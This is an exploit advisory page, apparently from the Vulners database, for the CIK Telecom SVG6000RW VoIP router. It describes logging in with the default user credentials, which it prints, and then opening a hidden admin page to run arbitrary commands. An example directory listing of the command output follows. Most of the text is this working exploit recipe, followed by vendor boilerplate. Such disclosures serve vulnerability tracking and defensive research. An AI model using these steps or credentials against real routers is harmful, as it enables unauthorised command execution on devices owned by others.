Vulners
Lucene search
CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
and can lead to Command Execution.
Exploit:
1) Login as a normal user
Default Username: User Password:cikvoip
2) change URL to http://URL/adm/system_command.asp
and now u can run commands.
Example:
Command: ls /etc_rw/web
Result:
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Dec 2014 00:00Current
7.1High risk
Vulners AI Score7.1